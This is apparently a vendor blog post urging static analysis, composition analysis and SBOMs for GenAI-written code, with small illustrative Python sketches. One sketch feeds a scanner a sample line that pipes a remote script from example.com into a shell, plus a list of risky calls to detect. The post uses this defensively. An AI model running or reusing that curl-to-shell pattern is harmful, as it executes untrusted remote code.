Don’t be afraid of GenAI code, but don’t trust it until you test it

“You are what you eat” applies figuratively to humans. But it applies literally to the large language models (LLMs) that power generative artificial intelligence (GenAI) tools. They really are what they eat.

If the massive datasets fed to LLMs from websites, forums, repositories, and open-source projects are poisoned with bias, errors, propaganda, and other junk, that’s what they will regurgitate. If the datasets are thorough, accurate, and not politicized, you’re much more likely to get useful, reliable results. Not guaranteed, but more likely.

Those who are increasingly using GenAI tools to write software code need to keep that in mind. Yes, those tools bring a host of seductive benefits to software development. They’re blazing fast; they don’t need sleep, coffee breaks, or vacations; they don’t demand a salary and benefits; and they don’t try to unionize.

Hence, the rush to employ them. GenAI-created code, in common use for less than 18 months, is now the fourth major component of software. The other three, which have been around for decades, are the code you wrote (proprietary), the code you bought (commercial), and (mostly free) open-source software (OSS).

But none of those were or are perfect—they are created by imperfect humans, after all. So GenAI tools, which create code by ingesting what already exists, aren’t perfect either. Numerous software experts have described GenAI tools as having the capability of a junior developer who has been trained and can produce serviceable code, but who needs a lot of oversight and supervision. In other words, their output must be rigorously tested for vulnerabilities and possible licensing conflicts—just like any other code.

Studies such as the annual “Open Source Security and Risk Analysis” (OSSRA) report by the Synopsys Cybersecurity Research Center document that need. Of the 1,703 codebases scanned for the OSSRA report:

  • 96% contained OSS, 84% had at least one vulnerability, and 48% contained at least one high-risk vulnerability.  
  • 54% had license conflicts and 31% contained OSS with no license.  
  • 89% contained OSS that was more than four years out of date, and 91% contained OSS that had not been updated for two years or more.

Obviously, code generated from those and other existing codebases will bring the same problems into what GenAI tools produce. That doesn’t mean organizations shouldn’t use GenAI, any more than it means they shouldn’t use OSS. It just means they need to put GenAI-generated code through the same testing regime as the rest.

That’s the message from analyst firm Gartner in its December 2023 report “Predicts 2024: AI & Cybersecurity—Turning Disruption into an Opportunity.” It forecasts the growing adoption of GenAI but offers some warnings. Among them, it vigorously debunks the idea that GenAI will eliminate the need for testing, noting that “through 2025, generative AI will cause a spike of cybersecurity resources required to secure it, causing more than a 15% incremental spend on application and data security.”

That makes sense, because one thing that isn’t debatable is that GenAI tools are fast: they can produce far more code than humans can. But unless the entire dataset fed to the LLM behind your GenAI tool is perfect (it isn’t), you need to test that code for security, quality, and reliability, along with compliance with any OSS licensing requirements.

Not only that, GenAI tools can also be “poisoned” by criminal hackers who inject malicious code samples into the training data fed to an LLM. That can lead the tool to generate code infected with malware.

So testing is crucial. And the three essential software testing methods—static analysis, dynamic analysis, and software composition analysis (SCA)—should be mandatory to ensure the security and quality of software, whatever its source.
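To make that idea concrete, here is a minimal static-analysis sketch in Python. It uses the standard-library ast module to walk a hypothetical GenAI-generated snippet and flag calls that often signal risk; the snippet, the list of risky call names, and the flag_risky_calls helper are all illustrative assumptions, and a real static analysis tool goes far deeper than this.

```python
# Toy static-analysis check: walk the AST of a (hypothetical) GenAI-generated
# snippet and flag calls that commonly signal risk. A real static analysis
# tool goes far deeper; this only illustrates the idea.
import ast

RISKY_CALLS = {"eval", "exec", "system", "popen"}  # illustrative, not exhaustive

def flag_risky_calls(source: str) -> list[str]:
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            # Handle both bare names (eval) and attribute calls (os.system)
            name = getattr(node.func, "id", None) or getattr(node.func, "attr", None)
            if name in RISKY_CALLS:
                findings.append(f"line {node.lineno}: suspicious call to {name}()")
    return findings

# Hypothetical snippet a GenAI tool might have produced
generated_snippet = 'import os\nos.system("curl http://example.com | sh")\n'
for finding in flag_risky_calls(generated_snippet):
    print(finding)
```

Running it against the sample snippet prints a warning about the os.system() call, exactly the kind of finding a reviewer should see before generated code is merged.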

In significant ways, the testing needed for GenAI code parallels that of OSS. With open source code, it’s critical to know its provenance—who made it, who maintains it (or not), what other software components it needs to function (dependencies), any known vulnerabilities in it, and what licensing provisions govern its use. An SCA tool helps find that information.
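As a rough sketch of the bookkeeping an SCA tool automates, the Python below checks a declared dependency list against a tiny, hard-coded advisory table. Every component name, version, and advisory, along with the audit helper, is a made-up assumption for illustration; a real SCA tool resolves transitive dependencies, parses version ranges properly, and queries maintained vulnerability and license databases.

```python
# Toy software composition analysis: cross-reference declared dependencies
# against a hypothetical, hard-coded advisory and license dataset.
from dataclasses import dataclass

@dataclass
class Advisory:
    component: str
    affected_below: str   # versions below this are considered vulnerable (illustrative)
    license: str

KNOWN_COMPONENTS = {   # hypothetical data for illustration only
    "examplelib": Advisory("examplelib", affected_below="2.4.0", license="MIT"),
    "legacyparser": Advisory("legacyparser", affected_below="9.9.9", license="unknown"),
}

def audit(dependencies: dict[str, str]) -> list[str]:
    """Return human-readable findings for each declared dependency."""
    findings = []
    for name, version in dependencies.items():
        advisory = KNOWN_COMPONENTS.get(name)
        if advisory is None:
            findings.append(f"{name}: unknown provenance, manual review needed")
            continue
        if version < advisory.affected_below:   # naive string compare; real tools parse semver
            findings.append(f"{name} {version}: known vulnerability, upgrade required")
        if advisory.license in ("unknown", ""):
            findings.append(f"{name}: no license on record, legal review needed")
    return findings

print("\n".join(audit({"examplelib": "2.1.0", "legacyparser": "1.0.0"})))
```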

It’s also why a Software Bill of Materials (SBOM)—an inventory of the entire supply chain for a software product—has become essential to using OSS safely. An SBOM is just as essential to using GenAI tools safely.
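For readers who have not worked with one, the sketch below parses a deliberately simplified, CycloneDX-style SBOM and flags a component with no declared license. The component names and versions are hypothetical, and in practice SBOMs are generated and consumed by tooling rather than written by hand.

```python
# Minimal sketch: read a simplified, CycloneDX-style SBOM (JSON) and flag
# components that lack license information. The inline document is a
# hypothetical example; real SBOMs carry far more metadata (suppliers,
# hashes, dependency graphs).
import json

sbom_json = """
{
  "bomFormat": "CycloneDX",
  "specVersion": "1.5",
  "components": [
    {"type": "library", "name": "examplelib", "version": "2.1.0",
     "licenses": [{"license": {"id": "MIT"}}]},
    {"type": "library", "name": "legacyparser", "version": "1.0.0"}
  ]
}
"""

sbom = json.loads(sbom_json)
for component in sbom.get("components", []):
    if not component.get("licenses"):
        print(f"{component['name']} {component['version']}: "
              "no license declared, review before shipping")
```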

It’s a version of President Reagan’s “trust but verify” mantra, except in this case, don’t trust until you verify. That’s an important warning to programmers, who can get a false sense of security from GenAI. Research already shows that developers are more likely to accept insecure, low-quality code if it comes from a GenAI tool than they would if a neighbor gave it to them or they found it on Stack Overflow.

As Jason Schmitt, general manager of the Synopsys Software Integrity Group, put it, the origin of code created with GenAI “introduces new risks and uncertainty to the software supply chain.” Since it came from LLMs trained on large datasets, “Is that opening me up to risk that I can’t really understand? The source of that [code] now matters,” he said.

So don’t be afraid of GenAI, but don’t be blind to its limits or its risks. Use it for routine and repetitive coding tasks, but leave the bespoke and intricate segments of an application to humans. And test its output with the same rigor that any other software code needs.

Remember, it comes from other software. For more information on how Synopsys can help you build trust in your software, visit www.synopsys.com/software.
